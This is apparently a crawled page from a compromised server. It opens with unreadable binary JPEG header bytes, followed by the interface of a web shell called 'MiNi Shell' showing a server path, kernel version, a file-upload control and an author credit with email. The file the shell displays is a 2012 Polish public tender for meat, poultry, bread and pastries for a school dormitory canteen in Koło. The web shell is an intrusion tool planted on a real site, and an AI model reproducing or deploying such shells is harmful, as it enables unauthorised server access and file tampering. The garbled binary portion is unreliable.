JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121114/240595-N-2012.html

<p class="kh_header"><b>Koło: SUKCESYWNA DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH  DLA POTRZEB STOŁÓWKI BURSY SZKOLNEJ W KOLE W RAMACH NASTĘPUJĄCYCH ODDZIELNYCH PAKIETÓW:

1) PAKIET NR 1  	 - 	MIĘSO, WĘDLINY I DRÓB,
2) PAKIET NR 2   	 - 	PIECZYWO I WYROBY CUKIERNICZE.</b><br>
<b>Numer ogłoszenia: 240595 - 2012; data zamieszczenia: 14.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bursa Szkolna , ul. Kolejowa 13, 62-600 Koło, woj. wielkopolskie, tel. 063 2610177, faks 063 2616727.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www. starostwokolskie.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH  DLA POTRZEB STOŁÓWKI BURSY SZKOLNEJ W KOLE W RAMACH NASTĘPUJĄCYCH ODDZIELNYCH PAKIETÓW:

1) PAKIET NR 1  	 - 	MIĘSO, WĘDLINY I DRÓB,
2) PAKIET NR 2   	 - 	PIECZYWO I WYROBY CUKIERNICZE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego  jest sukcesywna (wielokrotna) dostawa artykułów spożywczych dla potrzeb stołówki Bursy Szkolnej w Kole w ramach następujących oddzielnych pakietów:
 
1) Pakiet nr 1 	 -    	MIĘSO, WĘDLINY I DRÓB, 	
2) Pakiet nr 2 	 -	PIECZYWO I WYROBY CUKIERNICZE.	

Termin przydatności do spożycia dla artykułów spożywczych objętych przedmiotem zamówienia publicznego musi wynosić:  

1) w ramach Pakietu Nr 1:

termin przydatności do spożycia od chwili dostarczenia artykułu do magazynu Zamawiającego nie może być krótszy niż 70% okresu, w którym artykuł zachowuje zdatność do spożycia określoną przez producenta.

2) w ramach Pakietu Nr 2:

a) bułki muszą posiadać co najmniej 1 dniowy termin przydatności do spożycia  od chwili dostarczenia artykułów do magazynu Zamawiającego ,
b) chleb zwykły musi posiadać co najmniej 2 dniowy termin przydatności   do spożycia od chwili dostarczenia artykułu do magazynu Zamawiającego , 
c) chleb razowy-wieloziarnisty musi posiadać co najmniej 3 dniowy termin przydatności do spożycia od chwili dostarczenia artykułu do magazynu Zamawiającego,
d) wyroby cukiernicze muszą pochodzić z bieżącego wypieku.   

Każde opakowanie musi obligatoryjnie zawierać następujące dane:

1) nazwę środka spożywczego,
2) dane dotyczące składników występujących w środku spożywczym,
3) datę minimalnej trwałości albo termin przydatności do spożycia,
4) dane identyfikujące producenta środka spożywczego,
5) dane identyfikujące kraj, w którym wyprodukowano środek spożywczy,
6) zawartość netto lub liczbę sztuk środka spożywczego w opakowaniu,
7) warunki przechowywania, w przypadku gdy jego jakość zależy od warunków przechowywania,
8) oznaczenie partii produkcji,
9) klasę jakości handlowej.

Wymagania w zakresie przedmiotu zamówienia:

1) każdy produkt wytwarzany będzie zgodnie z przepisami ustawy  z dnia 25 sierpnia 2006 roku  o bezpieczeństwie żywności i żywienia (tekst jednolity Dz.U. z 2010 roku Nr 136, poz. 914 z późn. zm.) oraz ustawy z dnia 16 grudnia  2005 roku o produktach pochodzenia zwierzęcego (Dz.U. z 2006 roku Nr 17, poz. 127 z późn. zm.) wraz z rozporządzeniami wydanymi na ich podstawie,
2) każdy produkt realizowany będzie zgodnie z normami jakościowymi GHP, GMP lub systemem HACCP,
3) każdy dostarczony produkt winien być I klasy, zgodny z Polskę Normę,
4) na każde żądanie Zamawiającego Wykonawca jest zobowiązany okazać w stosunku do każdego produktu odpowiedni certyfikat zgodności z Polskę Normę lub normami europejskimi itp.

Cechy dyskwalifikujące wspólne dla mięsa:

obce posmaki, zapachy, oślizgłość, nalot pleśni, zazielenienie mięsa, występowanie gruczołów, fragmentów kości.

Cechy dyskwalifikujące wspólne dla wędlin:

obce posmaki, zapachy, oślizgłość, nalot pleśni, barwa szarozielona, zacieki tłuszczu  i galarety pod osłonkę, jej pęknięcia i wycieki farszu, w osłonkach naturalnych  lub sztucznych, składniki użyte do produkcji pozaklasowe lub z chrząstkami, ścięgnami itp., skupiska jednego ze składników, obecność szkodników oraz ich pozostałości, brak oznakowania opakowań, ich uszkodzenia mechaniczne, zerwanie plomby, zabrudzenia, plamy na powierzchni wynikające z niedowidzenia w miejscu styku z innymi batonami oraz zawilgocenie powierzchni, objawy obniżenia jędrności i elastyczności, nieprzyleganie osłonki do wędlin itp.

Wymagania szczegółowe dotyczące mięsa, wędlin i drobiu (dotyczy tylko Pakietu nr 1 ):

1) mięso świeże, nie mrożone, barwa jasnoróżowa, zapach typowy dla świeżego mięsa,  nie poddawane dodatkowym procesom technologicznym zwiększającym objętość,
2) wędliny świeże o typowym zapachu dla wyrobów wędzonych, parzonych  lub gotowanych, nie poddawane dodatkowym procesom technologicznym zwiększającym objętość,
3) drób świeży, nie poddawany dodatkowym procesom technologicznym zwiększającym objętość.

Wymagania szczegółowe dotyczące pieczywa i wyrobów cukierniczych  (dotyczy tylko Pakietu Nr 2 ):

1) dostarczone pieczywo pod względem smakowym i organoleptycznym musi być  I gatunku, świeże, odpowiedniej jakości, nie kruszące się i dopieczone,
2) dostarczone pieczywo i wyroby cukiernicze muszą być wyprodukowane w dzień  lub noc poprzedzającą dzień dostawy do Zamawiającego,
3) nie dopuszcza możliwości dostarczania przez Wykonawcę pieczywa lub wyrobów cukierniczych odświeżanych lub ze zwrotów.

Wymagania w zakresie opakowań: pojemniki plastikowe, z pokrywami, czyste,  bez obcych zapachów, powinny być przeznaczone tylko do jednego asortymentu, elementy powinny być ułożone  w opakowaniu w sposób niepowodujący deformacji i zapewniający estetyczny wygląd gotowego wyrobu.
Szczegółowy opis rzeczowy oraz ilościowy artykułów spożywczych w ramach poszczególnych pakietów objętych przedmiotem zamówienia publicznego określony został w druku FORMULARZ CENOWY.

Jeżeli w opisie przedmiotu zamówienia wystąpił lub został wskazany znak towarowy,  to należy przyjąć, iż Zamawiający wskazując je, dopuszcza składanie ofert równoważnych obejmujących artykuły spożywcze o właściwościach i standardach jakościowych nie gorszych niż te opisane przez podanie znaków towarowych. 
Szczegółowy opis sposobu wykonania przedmiotu zamówienia zawarty został w druku PROJEKT UMOWY..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.11.11.00-0, 15.13.14.00-9, 15.13.16.00-1, 15.11.20.00-6, 15.11.23.00-9, 15.11.40.00-0, 15.13.13.10-1, 15.13.11.34-3, 15.13.11.30-5, 15.13.11.35-0, 15.13.14.10-2, 15.13.12.00-7, 15.11.20.00-6, 15.41.21.00-0, 15.81.11.00-7, 15.81.15.00-1, 15.84.23.99-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są udokumentować oddzielnie dla poszczególnych pakietów składających się na przedmiot zamówienia, że posiadają aktualne (obowiązujące) decyzje administracyjne wydane odpowiednio przez właściwego terenowo Państwowego Powiatowego Inspektora Sanitarnego oraz organ Inspekcji Weterynaryjnej potwierdzające spełnianie przez ich zakłady produkcyjne wymagań    w zakresie produkcji i wprowadzania do obrotu produktów pochodzenia zwierzęcego lub niezwierzęcego zgodnych, co do rodzaju z artykułami spożywczymi objętymi przedmiotem zamówienia publicznego, na podstawie przepisów ustawy z dnia  25 sierpnia 2006 roku  o bezpieczeństwie żywności i żywienia (tekst jednolity  Dz.U. z 2010 roku Nr 136,  poz. 914 z późn. zm.) oraz ustawy z dnia 16 grudnia   2005 roku o produktach pochodzenia zwierzęcego (Dz.U. z 2006 roku Nr 17,                         poz. 127 z późn. zm.),  jeżeli w/w ustawy nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są udokumentować, w ciągu ostatnich 3 lat przed upływem terminu składania ofert wykonali lub aktualnie wykonują samodzielnie/w ramach konsorcjum lub spółki cywilnej/na podstawie pisemnego zobowiązania innego podmiotu, o którym mowa jest mowa w Załączniku Nr 5 dostawy artykułów spożywczych o łącznej wartości minimum 40.000 zł brutto dla Pakietu Nr 1 oraz 10.000 zł brutto dla Pakietu Nr 2, zgodnie z Załącznikiem Nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany druk FORMULARZ OFERTOWY dla poszczególnych pakietów,
2) oświadczanie dotyczące  zakresu rzeczowego oraz wartości usług, które zostaną wykonane przy udziale podwykonawców - na Załączniku Nr 4,
3) zobowiązanie do udostępnienia zasobów przez inne podmioty, zgodnie z Załącznikiem Nr 5,
4) pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów, jeżeli jest wymagane, 
5) pełnomocnictwo do składania oferty łącznej w zakresie określonym w art. 23 ust. 2 Ustawy, jeżeli jest wymagane</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. starostwokolskie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bursa Szkolna w Kole ul. Kolejowa 13 62-600 Koło.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, pokój nr 45..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1  -  MIĘSO, WĘDLINY I DRÓB,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis rzeczowy oraz ilościowy artykułów spożywczych w ramach poszczególnych pakietów objętych przedmiotem zamówienia publicznego określony został w druku FORMULARZ CENOWY..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.11.11.00-0, 15.13.14.00-9, 15.13.16.00-1, 15.11.20.00-6, 15.11.23.00-9, 15.11.40.00-0, 15.13.13.10-1, 15.13.11.34-5, 15.13.11.35-0, 15.13.14.10-2, 15.13.12.00-7, 15.11.20.00-6, 15.41.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2    -  PIECZYWO I WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis rzeczowy oraz ilościowy artykułów spożywczych w ramach poszczególnych pakietów objętych przedmiotem zamówienia publicznego określony został w druku FORMULARZ CENOWY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 15.81.15.00-1, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com